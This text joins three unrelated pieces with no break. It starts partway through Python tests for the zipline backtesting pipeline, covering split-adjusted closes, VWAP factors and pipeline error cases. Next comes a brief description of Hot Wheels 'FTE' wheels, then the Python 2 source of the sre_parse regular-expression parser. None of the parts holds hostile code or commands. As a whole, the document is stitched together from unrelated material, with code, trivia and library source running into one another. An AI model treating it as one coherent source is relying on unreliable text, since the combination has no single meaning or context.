                'start_date': cls.dates[10],
                'end_date': cls.dates[13],
                'exchange': 'NYSE',
            },
            {
                'sid': 2,
                'symbol': 'B',
                'start_date': cls.dates[11],
                'end_date': cls.dates[14],
                'exchange': 'NYSE',
            },
            {
                'sid': 3,
                'symbol': 'C',
                'start_date': cls.dates[12],
                'end_date': cls.dates[15],
                'exchange': 'NYSE',
            },
        ])
        return ret

    @classmethod
    def make_exchanges_info(cls, *args, **kwargs):
        return DataFrame({'exchange': ['NYSE'], 'country_code': ['US']})

    @classmethod
    def make_equity_daily_bar_data(cls, country_code, sids):
        cls.closes = DataFrame(
            {sid: arange(1, len(cls.dates) + 1) * sid for sid in sids},
            index=cls.dates,
            dtype=float,
        )
        cls.volumes = cls.closes * 1000
        for sid in sids:
            yield sid, DataFrame(
                {
                    'open': cls.closes[sid].values,
                    'high': cls.closes[sid].values,
                    'low': cls.closes[sid].values,
                    'close': cls.closes[sid].values,
                    'volume': cls.volumes[sid].values,
                },
                index=cls.dates,
            )

    @classmethod
    def init_class_fixtures(cls):
        super(ClosesAndVolumes, cls).init_class_fixtures()
        cls.first_asset_start = min(cls.equity_info.start_date)
        cls.last_asset_end = max(cls.equity_info.end_date)
        cls.assets = cls.asset_finder.retrieve_all(cls.asset_finder.sids)
        cls.trading_day = cls.trading_calendar.day

        # Add a split for 'A' on its second date.
        cls.split_asset = cls.assets[0]
        cls.split_date = cls.split_asset.start_date + cls.trading_day
        cls.split_ratio = 0.5
        cls.adjustments = DataFrame.from_records([
            {
                'sid': cls.split_asset.sid,
                'value': cls.split_ratio,
                'kind': MULTIPLY,
                'start_date': Timestamp('NaT'),
                'end_date': cls.split_date,
                'apply_date': cls.split_date,
            }
        ])

        cls.default_sim_params = SimulationParameters(
            start_session=cls.first_asset_start,
            end_session=cls.last_asset_end,
            trading_calendar=cls.trading_calendar,
            emission_rate='daily',
            data_frequency='daily',
        )

    def make_algo_kwargs(self, **overrides):
        return self.merge_with_inherited_algo_kwargs(
            ClosesAndVolumes,
            suite_overrides=dict(
                sim_params=self.default_sim_params,
                get_pipeline_loader=lambda column: self.pipeline_close_loader,
            ),
            method_overrides=overrides,
        )

    def init_instance_fixtures(self):
        super(ClosesAndVolumes, self).init_instance_fixtures()

        # View of the data on/after the split.
        self.adj_closes = adj_closes = self.closes.copy()
        adj_closes.ix[:self.split_date, self.split_asset] *= self.split_ratio
        self.adj_volumes = adj_volumes = self.volumes.copy()
        adj_volumes.ix[:self.split_date, self.split_asset] *= self.split_ratio

        self.pipeline_close_loader = DataFrameLoader(
            column=USEquityPricing.close,
            baseline=self.closes,
            adjustments=self.adjustments,
        )

        self.pipeline_volume_loader = DataFrameLoader(
            column=USEquityPricing.volume,
            baseline=self.volumes,
            adjustments=self.adjustments,
        )

    def expected_close(self, date, asset):
        if date < self.split_date:
            lookup = self.closes
        else:
            lookup = self.adj_closes
        return lookup.loc[date, asset]

    def expected_volume(self, date, asset):
        if date < self.split_date:
            lookup = self.volumes
        else:
            lookup = self.adj_volumes
        return lookup.loc[date, asset]

    def exists(self, date, asset):
        return asset.start_date <= date <= asset.end_date

    def test_attach_pipeline_after_initialize(self):
        """
        Assert that calling attach_pipeline after initialize raises correctly.
        """
        def initialize(context):
            pass

        def late_attach(context, data):
            attach_pipeline(Pipeline(), 'test')
            raise AssertionError("Shouldn't make it past attach_pipeline!")

        algo = self.make_algo(
            initialize=initialize,
            handle_data=late_attach,
        )

        with self.assertRaises(AttachPipelineAfterInitialize):
            algo.run()

        def barf(context, data):
            raise AssertionError("Shouldn't make it past before_trading_start")

        algo = self.make_algo(
            initialize=initialize,
            before_trading_start=late_attach,
            handle_data=barf,
        )

        with self.assertRaises(AttachPipelineAfterInitialize):
            algo.run()

    def test_pipeline_output_after_initialize(self):
        """
        Assert that calling pipeline_output after initialize raises correctly.
        """
        def initialize(context):
            attach_pipeline(Pipeline(), 'test')
            pipeline_output('test')
            raise AssertionError("Shouldn't make it past pipeline_output()")

        def handle_data(context, data):
            raise AssertionError("Shouldn't make it past initialize!")

        def before_trading_start(context, data):
            raise AssertionError("Shouldn't make it past initialize!")

        algo = self.make_algo(
            initialize=initialize,
            handle_data=handle_data,
            before_trading_start=before_trading_start,
        )

        with self.assertRaises(PipelineOutputDuringInitialize):
            algo.run()

    def test_get_output_nonexistent_pipeline(self):
        """
        Assert that calling add_pipeline after initialize raises appropriately.
        """
        def initialize(context):
            attach_pipeline(Pipeline(), 'test')

        def handle_data(context, data):
            raise AssertionError("Shouldn't make it past before_trading_start")

        def before_trading_start(context, data):
            pipeline_output('not_test')
            raise AssertionError("Shouldn't make it past pipeline_output!")

        algo = self.make_algo(
            initialize=initialize,
            handle_data=handle_data,
            before_trading_start=before_trading_start,
        )

        with self.assertRaises(NoSuchPipeline):
            algo.run()

    @parameterized.expand([('default', None),
                           ('day', 1),
                           ('week', 5),
                           ('year', 252),
                           ('all_but_one_day', 'all_but_one_day'),
                           ('custom_iter', 'custom_iter')])
    def test_assets_appear_on_correct_days(self, test_name, chunks):
        """
        Assert that assets appear at correct times during a backtest, with
        correctly-adjusted close price values.
        """
        if chunks == 'all_but_one_day':
            chunks = (
                self.dates.get_loc(self.last_asset_end) -
                self.dates.get_loc(self.first_asset_start)
            ) - 1
        elif chunks == 'custom_iter':
            chunks = []
            st = np.random.RandomState(12345)
            remaining = (
                self.dates.get_loc(self.last_asset_end) -
                self.dates.get_loc(self.first_asset_start)
            )
            while remaining > 0:
                chunk = st.randint(3)
                chunks.append(chunk)
                remaining -= chunk

        def initialize(context):
            p = attach_pipeline(Pipeline(), 'test', chunks=chunks)
            p.add(USEquityPricing.close.latest, 'close')

        def handle_data(context, data):
            results = pipeline_output('test')
            date = get_datetime().normalize()
            for asset in self.assets:
                # Assets should appear iff they exist today and yesterday.
                exists_today = self.exists(date, asset)
                existed_yesterday = self.exists(date - self.trading_day, asset)
                if exists_today and existed_yesterday:
                    latest = results.loc[asset, 'close']
                    self.assertEqual(latest, self.expected_close(date, asset))
                else:
                    self.assertNotIn(asset, results.index)

        before_trading_start = handle_data

        algo = self.make_algo(
            initialize=initialize,
            handle_data=handle_data,
            before_trading_start=before_trading_start,
        )

        # Run for a week in the middle of our data.
        algo.run()

    def test_multiple_pipelines(self):
        """
        Test that we can attach multiple pipelines and access the correct
        output based on the pipeline name.
        """
        def initialize(context):
            pipeline_close = attach_pipeline(Pipeline(), 'test_close')
            pipeline_volume = attach_pipeline(Pipeline(), 'test_volume')

            pipeline_close.add(USEquityPricing.close.latest, 'close')
            pipeline_volume.add(USEquityPricing.volume.latest, 'volume')

        def handle_data(context, data):
            closes = pipeline_output('test_close')
            volumes = pipeline_output('test_volume')
            date = get_datetime().normalize()
            for asset in self.assets:
                # Assets should appear iff they exist today and yesterday.
                exists_today = self.exists(date, asset)
                existed_yesterday = self.exists(date - self.trading_day, asset)
                if exists_today and existed_yesterday:
                    self.assertEqual(
                        closes.loc[asset, 'close'],
                        self.expected_close(date, asset)
                    )
                    self.assertEqual(
                        volumes.loc[asset, 'volume'],
                        self.expected_volume(date, asset)
                    )
                else:
                    self.assertNotIn(asset, closes.index)
                    self.assertNotIn(asset, volumes.index)

        column_to_loader = {
            USEquityPricing.close: self.pipeline_close_loader,
            USEquityPricing.volume: self.pipeline_volume_loader,
        }

        algo = self.make_algo(
            initialize=initialize,
            handle_data=handle_data,
            get_pipeline_loader=lambda column: column_to_loader[column],
        )
        algo.run()

    def test_duplicate_pipeline_names(self):
        """
        Test that we raise an error when we try to attach a pipeline with a
        name that already exists for another attached pipeline.
        """
        def initialize(context):
            attach_pipeline(Pipeline(), 'test')
            attach_pipeline(Pipeline(), 'test')

        algo = self.make_algo(initialize=initialize)
        with self.assertRaises(DuplicatePipelineName):
            algo.run()


class MockDailyBarSpotReader(object):
    """
    A BcolzDailyBarReader which returns a constant value for spot price.
    """
    def get_value(self, sid, day, column):
        return 100.0


class PipelineAlgorithmTestCase(WithMakeAlgo,
                                WithBcolzEquityDailyBarReaderFromCSVs,
                                WithAdjustmentReader,
                                ZiplineTestCase):
    AAPL = 1
    MSFT = 2
    BRK_A = 3
    ASSET_FINDER_EQUITY_SIDS = AAPL, MSFT, BRK_A
    ASSET_FINDER_EQUITY_SYMBOLS = 'AAPL', 'MSFT', 'BRK_A'
    START_DATE = Timestamp('2014', tz='UTC')
    END_DATE = Timestamp('2015', tz='UTC')

    SIM_PARAMS_DATA_FREQUENCY = 'daily'
    DATA_PORTAL_USE_MINUTE_DATA = False

    # FIXME: This currently uses benchmark returns from the trading
    # environment.
    BENCHMARK_SID = None

    ASSET_FINDER_COUNTRY_CODE = 'US'

    @classmethod
    def make_equity_daily_bar_data(cls, country_code, sids):
        resources = {
            cls.AAPL: join(TEST_RESOURCE_PATH, 'AAPL.csv'),
            cls.MSFT: join(TEST_RESOURCE_PATH, 'MSFT.csv'),
            cls.BRK_A: join(TEST_RESOURCE_PATH, 'BRK-A.csv'),
        }
        cls.raw_data = raw_data = {
            asset: read_csv(path, parse_dates=['day']).set_index('day')
            for asset, path in resources.items()
        }
        # Add 'price' column as an alias because all kinds of stuff in zipline
        # depends on it being present.
        # :/
        for frame in raw_data.values():
            frame['price'] = frame['close']

        return resources

    @classmethod
    def make_splits_data(cls):
        return DataFrame.from_records([
            {
                'effective_date': str_to_seconds('2014-06-09'),
                'ratio': (1 / 7.0),
                'sid': cls.AAPL,
            }
        ])

    @classmethod
    def make_mergers_data(cls):
        return create_empty_splits_mergers_frame()

    @classmethod
    def make_dividends_data(cls):
        return pd.DataFrame(array([], dtype=[
            ('sid', uint32),
            ('amount', float64),
            ('record_date', 'datetime64[ns]'),
            ('ex_date', 'datetime64[ns]'),
            ('declared_date', 'datetime64[ns]'),
            ('pay_date', 'datetime64[ns]'),
        ]))

    @classmethod
    def init_class_fixtures(cls):
        super(PipelineAlgorithmTestCase, cls).init_class_fixtures()
        cls.pipeline_loader = USEquityPricingLoader.without_fx(
            cls.bcolz_equity_daily_bar_reader,
            cls.adjustment_reader,
        )
        cls.dates = cls.raw_data[cls.AAPL].index.tz_localize('UTC')
        cls.AAPL_split_date = Timestamp("2014-06-09", tz='UTC')
        cls.assets = cls.asset_finder.retrieve_all(
            cls.ASSET_FINDER_EQUITY_SIDS
        )

    def make_algo_kwargs(self, **overrides):
        return self.merge_with_inherited_algo_kwargs(
            PipelineAlgorithmTestCase,
            suite_overrides=dict(
                get_pipeline_loader=lambda column: self.pipeline_loader,
            ),
            method_overrides=overrides,
        )

    def compute_expected_vwaps(self, window_lengths):
        AAPL, MSFT, BRK_A = self.AAPL, self.MSFT, self.BRK_A

        # Our view of the data before AAPL's split on June 9, 2014.
        raw = {k: v.copy() for k, v in iteritems(self.raw_data)}

        split_date = self.AAPL_split_date
        split_loc = self.dates.get_loc(split_date)
        split_ratio = 7.0

        # Our view of the data after AAPL's split. All prices from before June
        # 9 get divided by the split ratio, and volumes get multiplied by the
        # split ratio.
        adj = {k: v.copy() for k, v in iteritems(self.raw_data)}
        for column in 'open', 'high', 'low', 'close':
            adj[AAPL].ix[:split_loc, column] /= split_ratio
        adj[AAPL].ix[:split_loc, 'volume'] *= split_ratio

        # length -> asset -> expected vwap
        vwaps = {length: {} for length in window_lengths}
        for length in window_lengths:
            for asset in AAPL, MSFT, BRK_A:
                raw_vwap = rolling_vwap(raw[asset], length)
                adj_vwap = rolling_vwap(adj[asset], length)
                # Shift computed results one day forward so that they're
                # labelled by the date on which they'll be seen in the
                # algorithm. (We can't show the close price for day N until
                # day N + 1.)
                vwaps[length][asset] = concat(
                    [
                        raw_vwap[:split_loc - 1],
                        adj_vwap[split_loc - 1:]
                    ]
                ).shift(1, self.trading_calendar.day)

        # Make sure all the expected vwaps have the same dates.
        vwap_dates = vwaps[1][self.AAPL].index
        for dict_ in itervalues(vwaps):
            # Each value is a dict mapping sid -> expected series.
            for series in itervalues(dict_):
                self.assertTrue((vwap_dates == series.index).all())

        # Spot check expectations near the AAPL split.
        # length 1 vwap for the morning before the split should be the close
        # price of the previous day.
        before_split = vwaps[1][AAPL].loc[split_date -
                                          self.trading_calendar.day]
        assert_almost_equal(before_split, 647.3499, decimal=2)
        assert_almost_equal(
            before_split,
            raw[AAPL].loc[split_date - (2 * self.trading_calendar.day),
                          'close'],
            decimal=2,
        )

        # length 1 vwap for the morning of the split should be the close price
        # of the previous day, **ADJUSTED FOR THE SPLIT**.
        on_split = vwaps[1][AAPL].loc[split_date]
        assert_almost_equal(on_split, 645.5700 / split_ratio, decimal=2)
        assert_almost_equal(
            on_split,
            raw[AAPL].loc[split_date - self.trading_calendar.day,
                          'close'] / split_ratio,
            decimal=2,
        )

        # length 1 vwap on the day after the split should be the as-traded
        # close on the split day.
        after_split = vwaps[1][AAPL].loc[split_date +
                                         self.trading_calendar.day]
        assert_almost_equal(after_split, 93.69999, decimal=2)
        assert_almost_equal(
            after_split,
            raw[AAPL].loc[split_date, 'close'],
            decimal=2,
        )

        return vwaps

    @parameterized.expand([
        (True,),
        (False,),
    ])
    def test_handle_adjustment(self, set_screen):
        AAPL, MSFT, BRK_A = assets = self.assets
        window_lengths = [1, 2, 5, 10]
        vwaps = self.compute_expected_vwaps(window_lengths)

        def vwap_key(length):
            return "vwap_%d" % length

        def initialize(context):
            pipeline = Pipeline()
            context.vwaps = []
            for length in vwaps:
                name = vwap_key(length)
                factor = VWAP(window_length=length)
                context.vwaps.append(factor)
                pipeline.add(factor, name=name)

            filter_ = (USEquityPricing.close.latest > 300)
            pipeline.add(filter_, 'filter')
            if set_screen:
                pipeline.set_screen(filter_)

            attach_pipeline(pipeline, 'test')

        def handle_data(context, data):
            today = normalize_date(get_datetime())
            results = pipeline_output('test')
            expect_over_300 = {
                AAPL: today < self.AAPL_split_date,
                MSFT: False,
                BRK_A: True,
            }
            for asset in assets:
                should_pass_filter = expect_over_300[asset]
                if set_screen and not should_pass_filter:
                    self.assertNotIn(asset, results.index)
                    continue

                asset_results = results.loc[asset]
                self.assertEqual(asset_results['filter'], should_pass_filter)
                for length in vwaps:
                    computed = results.loc[asset, vwap_key(length)]
                    expected = vwaps[length][asset].loc[today]
                    # Only having two places of precision here is a bit
                    # unfortunate.
                    assert_almost_equal(computed, expected, decimal=2)

        # Do the same checks in before_trading_start
        before_trading_start = handle_data

        self.run_algorithm(
            initialize=initialize,
            handle_data=handle_data,
            before_trading_start=before_trading_start,
            sim_params=SimulationParameters(
                start_session=self.dates[max(window_lengths)],
                end_session=self.dates[-1],
                data_frequency='daily',
                emission_rate='daily',
                trading_calendar=self.trading_calendar,
            )
        )

    def test_empty_pipeline(self):
        # For ensuring we call before_trading_start.
count = [0] def initialize(context): pipeline = attach_pipeline(Pipeline(), 'test') vwap = VWAP(window_length=10) pipeline.add(vwap, 'vwap') # Nothing should have prices less than 0. pipeline.set_screen(vwap < 0) def handle_data(context, data): pass def before_trading_start(context, data): context.results = pipeline_output('test') self.assertTrue(context.results.empty) count[0] += 1 self.run_algorithm( initialize=initialize, handle_data=handle_data, before_trading_start=before_trading_start, sim_params=SimulationParameters( start_session=self.dates[0], end_session=self.dates[-1], data_frequency='daily', emission_rate='daily', trading_calendar=self.trading_calendar, ) ) self.assertTrue(count[0] > 0) def test_pipeline_beyond_daily_bars(self): """ Ensure that we can run an algo with pipeline beyond the max date of the daily bars. """ # For ensuring we call before_trading_start. count = [0] current_day = self.trading_calendar.next_session_label( self.pipeline_loader.raw_price_reader.last_available_dt, ) def initialize(context): pipeline = attach_pipeline(Pipeline(), 'test') vwap = VWAP(window_length=10) pipeline.add(vwap, 'vwap') # Nothing should have prices less than 0. 
pipeline.set_screen(vwap < 0) def handle_data(context, data): pass def before_trading_start(context, data): context.results = pipeline_output('test') self.assertTrue(context.results.empty) count[0] += 1 self.run_algorithm( initialize=initialize, handle_data=handle_data, before_trading_start=before_trading_start, sim_params=SimulationParameters( start_session=self.dates[0], end_session=current_day, data_frequency='daily', emission_rate='daily', trading_calendar=self.trading_calendar, ) ) self.assertTrue(count[0] > 0) class PipelineSequenceTestCase(WithMakeAlgo, ZiplineTestCase): # run algorithm for 3 days START_DATE = pd.Timestamp('2014-12-29', tz='utc') END_DATE = pd.Timestamp('2014-12-31', tz='utc') ASSET_FINDER_COUNTRY_CODE = 'US' def get_pipeline_loader(self): raise AssertionError("Loading terms for pipeline with no inputs") def test_pipeline_compute_before_bts(self): # for storing and keeping track of calls to BTS and TestFactor.compute trace = [] class TestFactor(CustomFactor): inputs = () # window_length doesn't actually matter for this test case window_length = 1 def compute(self, today, assets, out): trace.append("CustomFactor call") def initialize(context): pipeline = attach_pipeline(Pipeline(), 'my_pipeline') test_factor = TestFactor() pipeline.add(test_factor, 'test_factor') def before_trading_start(context, data): trace.append("BTS call") pipeline_output('my_pipeline') self.run_algorithm( initialize=initialize, before_trading_start=before_trading_start, get_pipeline_loader=self.get_pipeline_loader, ) # All pipeline computation calls should occur before any BTS calls, # and the algorithm is being run for 3 days, so the first 3 calls # should be to the custom factor and the next 3 calls should be to BTS expected_result = ["CustomFactor call"] * 3 + ["BTS call"] * 3 self.assertEqual(trace, expected_result)
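The expected values in these tests hinge on the rolling VWAP definition: the sum of price times volume over a trailing window, divided by the sum of volume over the same window. As a minimal sketch with pandas — the bar data is hypothetical and this `rolling_vwap` is my own stand-in, not zipline's helper of the same name:

```python
import pandas as pd

# Hypothetical daily bars; the column names mirror the close/volume
# fields used in the tests above.
bars = pd.DataFrame({
    "close": [10.0, 11.0, 12.0, 13.0],
    "volume": [100, 200, 100, 100],
})

def rolling_vwap(frame, length):
    """Volume-weighted average price over a trailing window of `length` bars."""
    notional = (frame["close"] * frame["volume"]).rolling(length).sum()
    return notional / frame["volume"].rolling(length).sum()

# The last 2-bar VWAP is (12*100 + 13*100) / (100 + 100) = 12.5.
print(rolling_vwap(bars, 2).iloc[-1])
```

The one-day shift applied in `compute_expected_vwaps` is separate from this formula: it only relabels each result with the date on which the algorithm can first observe it.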
FTE, or Faster Than Ever, is a line of Hot Wheels wheel types. Cars with these wheels had special nickel-plated axles, reducing friction and increasing the car's speed. The wheels are always the same "bronze" color. FTE wheels are essentially the same as the OH5SP wheels but differ in color and axle. Because of the additional operation of nickel-plating the axles, these wheels are more expensive to produce than wheels on normal axles, which may be why, as of 2014/2015, this wheel type is not seen as often as it was in 2005/2006.
# # Secret Labs' Regular Expression Engine # # convert re-style regular expression to sre pattern # # Copyright (c) 1998-2001 by Secret Labs AB. All rights reserved. # # See the sre.py file for information on usage and redistribution. # """Internal support module for sre""" # XXX: show string offset and offending character for all errors # this module works under 1.5.2 and later. don't use string methods import string, sys from sre_constants import * SPECIAL_CHARS = ".\\[{()*+?^$|" REPEAT_CHARS = "*+?{" DIGITS = tuple("0123456789") OCTDIGITS = tuple("01234567") HEXDIGITS = tuple("0123456789abcdefABCDEF") WHITESPACE = tuple(" \t\n\r\v\f") ESCAPES = { r"\a": (LITERAL, ord("\a")), r"\b": (LITERAL, ord("\b")), r"\f": (LITERAL, ord("\f")), r"\n": (LITERAL, ord("\n")), r"\r": (LITERAL, ord("\r")), r"\t": (LITERAL, ord("\t")), r"\v": (LITERAL, ord("\v")), r"\\": (LITERAL, ord("\\")) } CATEGORIES = { r"\A": (AT, AT_BEGINNING_STRING), # start of string r"\b": (AT, AT_BOUNDARY), r"\B": (AT, AT_NON_BOUNDARY), r"\d": (IN, [(CATEGORY, CATEGORY_DIGIT)]), r"\D": (IN, [(CATEGORY, CATEGORY_NOT_DIGIT)]), r"\s": (IN, [(CATEGORY, CATEGORY_SPACE)]), r"\S": (IN, [(CATEGORY, CATEGORY_NOT_SPACE)]), r"\w": (IN, [(CATEGORY, CATEGORY_WORD)]), r"\W": (IN, [(CATEGORY, CATEGORY_NOT_WORD)]), r"\Z": (AT, AT_END_STRING), # end of string } FLAGS = { # standard flags "i": SRE_FLAG_IGNORECASE, "L": SRE_FLAG_LOCALE, "m": SRE_FLAG_MULTILINE, "s": SRE_FLAG_DOTALL, "x": SRE_FLAG_VERBOSE, # extensions "t": SRE_FLAG_TEMPLATE, "u": SRE_FLAG_UNICODE, } # figure out best way to convert hex/octal numbers to integers try: int("10", 8) atoi = int # 2.0 and later except TypeError: atoi = string.atoi # 1.5.2 class Pattern: # master pattern object. 
keeps track of global attributes def __init__(self): self.flags = 0 self.open = [] self.groups = 1 self.groupdict = {} def opengroup(self, name=None): gid = self.groups self.groups = gid + 1 if name is not None: ogid = self.groupdict.get(name, None) if ogid is not None: raise error, ("redefinition of group name %s as group %d; " "was group %d" % (repr(name), gid, ogid)) self.groupdict[name] = gid self.open.append(gid) return gid def closegroup(self, gid): self.open.remove(gid) def checkgroup(self, gid): return gid < self.groups and gid not in self.open class SubPattern: # a subpattern, in intermediate form def __init__(self, pattern, data=None): self.pattern = pattern if data is None: data = [] self.data = data self.width = None def dump(self, level=0): nl = 1 for op, av in self.data: print level*" " + op,; nl = 0 if op == "in": # member sublanguage print; nl = 1 for op, a in av: print (level+1)*" " + op, a elif op == "branch": print; nl = 1 i = 0 for a in av[1]: if i > 0: print level*" " + "or" a.dump(level+1); nl = 1 i = i + 1 elif type(av) in (type(()), type([])): for a in av: if isinstance(a, SubPattern): if not nl: print a.dump(level+1); nl = 1 else: print a, ; nl = 0 else: print av, ; nl = 0 if not nl: print def __repr__(self): return repr(self.data) def __len__(self): return len(self.data) def __delitem__(self, index): del self.data[index] def __getitem__(self, index): return self.data[index] def __setitem__(self, index, code): self.data[index] = code def __getslice__(self, start, stop): return SubPattern(self.pattern, self.data[start:stop]) def insert(self, index, code): self.data.insert(index, code) def append(self, code): self.data.append(code) def getwidth(self): # determine the width (min, max) for this subpattern if self.width: return self.width lo = hi = 0L for op, av in self.data: if op is BRANCH: i = sys.maxint j = 0 for av in av[1]: l, h = av.getwidth() i = min(i, l) j = max(j, h) lo = lo + i hi = hi + j elif op is CALL: i, j = av.getwidth() lo = 
lo + i hi = hi + j elif op is SUBPATTERN: i, j = av[1].getwidth() lo = lo + i hi = hi + j elif op in (MIN_REPEAT, MAX_REPEAT): i, j = av[2].getwidth() lo = lo + long(i) * av[0] hi = hi + long(j) * av[1] elif op in (ANY, RANGE, IN, LITERAL, NOT_LITERAL, CATEGORY): lo = lo + 1 hi = hi + 1 elif op == SUCCESS: break self.width = int(min(lo, sys.maxint)), int(min(hi, sys.maxint)) return self.width class Tokenizer: def __init__(self, string): self.string = string self.index = 0 self.__next() def __next(self): if self.index >= len(self.string): self.next = None return char = self.string[self.index] if char[0] == "\\": try: c = self.string[self.index + 1] except IndexError: raise error, "bogus escape (end of line)" char = char + c self.index = self.index + len(char) self.next = char def match(self, char, skip=1): if char == self.next: if skip: self.__next() return 1 return 0 def get(self): this = self.next self.__next() return this def tell(self): return self.index, self.next def seek(self, index): self.index, self.next = index def isident(char): return "a" <= char <= "z" or "A" <= char <= "Z" or char == "_" def isdigit(char): return "0" <= char <= "9" def isname(name): # check that group name is a valid string if not isident(name[0]): return False for char in name: if not isident(char) and not isdigit(char): return False return True def _group(escape, groups): # check if the escape string represents a valid group try: gid = atoi(escape[1:]) if gid and gid < groups: return gid except ValueError: pass return None # not a valid group def _class_escape(source, escape): # handle escape code inside character class code = ESCAPES.get(escape) if code: return code code = CATEGORIES.get(escape) if code: return code try: if escape[1:2] == "x": # hexadecimal escape (exactly two digits) while source.next in HEXDIGITS and len(escape) < 4: escape = escape + source.get() escape = escape[2:] if len(escape) != 2: raise error, "bogus escape: %s" % repr("\\" + escape) return LITERAL, 
atoi(escape, 16) & 0xff elif escape[1:2] in OCTDIGITS: # octal escape (up to three digits) while source.next in OCTDIGITS and len(escape) < 5: escape = escape + source.get() escape = escape[1:] return LITERAL, atoi(escape, 8) & 0xff if len(escape) == 2: return LITERAL, ord(escape[1]) except ValueError: pass raise error, "bogus escape: %s" % repr(escape) def _escape(source, escape, state): # handle escape code in expression code = CATEGORIES.get(escape) if code: return code code = ESCAPES.get(escape) if code: return code try: if escape[1:2] == "x": # hexadecimal escape while source.next in HEXDIGITS and len(escape) < 4: escape = escape + source.get() if len(escape) != 4: raise ValueError return LITERAL, atoi(escape[2:], 16) & 0xff elif escape[1:2] == "0": # octal escape while source.next in OCTDIGITS and len(escape) < 4: escape = escape + source.get() return LITERAL, atoi(escape[1:], 8) & 0xff elif escape[1:2] in DIGITS: # octal escape *or* decimal group reference (sigh) if source.next in DIGITS: escape = escape + source.get() if (escape[1] in OCTDIGITS and escape[2] in OCTDIGITS and source.next in OCTDIGITS): # got three octal digits; this is an octal escape escape = escape + source.get() return LITERAL, atoi(escape[1:], 8) & 0xff # got at least one decimal digit; this is a group reference group = _group(escape, state.groups) if group: if not state.checkgroup(group): raise error, "cannot refer to open group" return GROUPREF, group raise ValueError if len(escape) == 2: return LITERAL, ord(escape[1]) except ValueError: pass raise error, "bogus escape: %s" % repr(escape) def _parse_sub(source, state, nested=1): # parse an alternation: a|b|c items = [] while 1: items.append(_parse(source, state)) if source.match("|"): continue if not nested: break if not source.next or source.match(")", 0): break else: raise error, "pattern not properly closed" if len(items) == 1: return items[0] subpattern = SubPattern(state) # check if all items share a common prefix while 1: prefix 
= None for item in items: if not item: break if prefix is None: prefix = item[0] elif item[0] != prefix: break else: # all subitems start with a common "prefix". # move it out of the branch for item in items: del item[0] subpattern.append(prefix) continue # check next one break # check if the branch can be replaced by a character set for item in items: if len(item) != 1 or item[0][0] != LITERAL: break else: # we can store this as a character set instead of a # branch (the compiler may optimize this even more) set = [] for item in items: set.append(item[0]) subpattern.append((IN, set)) return subpattern subpattern.append((BRANCH, (None, items))) return subpattern def _parse(source, state): # parse a simple pattern subpattern = SubPattern(state) while 1: if source.next in ("|", ")"): break # end of subpattern this = source.get() if this is None: break # end of pattern if state.flags & SRE_FLAG_VERBOSE: # skip whitespace and comments if this in WHITESPACE: continue if this == "#": while 1: this = source.get() if this in (None, "\n"): break continue if this and this[0] not in SPECIAL_CHARS: subpattern.append((LITERAL, ord(this))) elif this == "[": # character set set = [] ## if source.match(":"): ## pass # handle character classes if source.match("^"): set.append((NEGATE, None)) # check remaining characters start = set[:] while 1: this = source.get() if this == "]" and set != start: break elif this and this[0] == "\\": code1 = _class_escape(source, this) elif this: code1 = LITERAL, ord(this) else: raise error, "unexpected end of regular expression" if source.match("-"): # potential range this = source.get() if this == "]": if code1[0] is IN: code1 = code1[1][0] set.append(code1) set.append((LITERAL, ord("-"))) break elif this: if this[0] == "\\": code2 = _class_escape(source, this) else: code2 = LITERAL, ord(this) if code1[0] != LITERAL or code2[0] != LITERAL: raise error, "bad character range" lo = code1[1] hi = code2[1] if hi < lo: raise error, "bad character range" 
set.append((RANGE, (lo, hi))) else: raise error, "unexpected end of regular expression" else: if code1[0] is IN: code1 = code1[1][0] set.append(code1) # XXX: <fl> should move set optimization to compiler! if len(set)==1 and set[0][0] is LITERAL: subpattern.append(set[0]) # optimization elif len(set)==2 and set[0][0] is NEGATE and set[1][0] is LITERAL: subpattern.append((NOT_LITERAL, set[1][1])) # optimization else: # XXX: <fl> should add charmap optimization here subpattern.append((IN, set)) elif this and this[0] in REPEAT_CHARS: # repeat previous item if this == "?": min, max = 0, 1 elif this == "*": min, max = 0, MAXREPEAT elif this == "+": min, max = 1, MAXREPEAT elif this == "{": here = source.tell() min, max = 0, MAXREPEAT lo = hi = "" while source.next in DIGITS: lo = lo + source.get() if source.match(","): while source.next in DIGITS: hi = hi + source.get() else: hi = lo if not source.match("}"): subpattern.append((LITERAL, ord(this))) source.seek(here) continue if lo: min = atoi(lo) if hi: max = atoi(hi) if max < min: raise error, "bad repeat interval" else: raise error, "not supported" # figure out which item to repeat if subpattern: item = subpattern[-1:] else: item = None if not item or (len(item) == 1 and item[0][0] == AT): raise error, "nothing to repeat" if item[0][0] in (MIN_REPEAT, MAX_REPEAT): raise error, "multiple repeat" if source.match("?"): subpattern[-1] = (MIN_REPEAT, (min, max, item)) else: subpattern[-1] = (MAX_REPEAT, (min, max, item)) elif this == ".": subpattern.append((ANY, None)) elif this == "(": group = 1 name = None if source.match("?"): group = 0 # options if source.match("P"): # python extensions if source.match("<"): # named group: skip forward to end of name name = "" while 1: char = source.get() if char is None: raise error, "unterminated name" if char == ">": break name = name + char group = 1 if not isname(name): raise error, "bad character in group name" elif source.match("="): # named backreference name = "" while 1: char 
= source.get() if char is None: raise error, "unterminated name" if char == ")": break name = name + char if not isname(name): raise error, "bad character in group name" gid = state.groupdict.get(name) if gid is None: raise error, "unknown group name" subpattern.append((GROUPREF, gid)) continue else: char = source.get() if char is None: raise error, "unexpected end of pattern" raise error, "unknown specifier: ?P%s" % char elif source.match(":"): # non-capturing group group = 2 elif source.match("#"): # comment while 1: if source.next is None or source.next == ")": break source.get() if not source.match(")"): raise error, "unbalanced parenthesis" continue elif source.next in ("=", "!", "<"): # lookahead assertions char = source.get() dir = 1 if char == "<": if source.next not in ("=", "!"): raise error, "syntax error" dir = -1 # lookbehind char = source.get() p = _parse_sub(source, state) if not source.match(")"): raise error, "unbalanced parenthesis" if char == "=": subpattern.append((ASSERT, (dir, p))) else: subpattern.append((ASSERT_NOT, (dir, p))) continue else: # flags if not source.next in FLAGS: raise error, "unexpected end of pattern" while source.next in FLAGS: state.flags = state.flags | FLAGS[source.get()] if group: # parse group contents if group == 2: # anonymous group group = None else: group = state.opengroup(name) p = _parse_sub(source, state) if not source.match(")"): raise error, "unbalanced parenthesis" if group is not None: state.closegroup(group) subpattern.append((SUBPATTERN, (group, p))) else: while 1: char = source.get() if char is None: raise error, "unexpected end of pattern" if char == ")": break raise error, "unknown extension" elif this == "^": subpattern.append((AT, AT_BEGINNING)) elif this == "$": subpattern.append((AT, AT_END)) elif this and this[0] == "\\": code = _escape(source, this, state) subpattern.append(code) else: raise error, "parser error" return subpattern 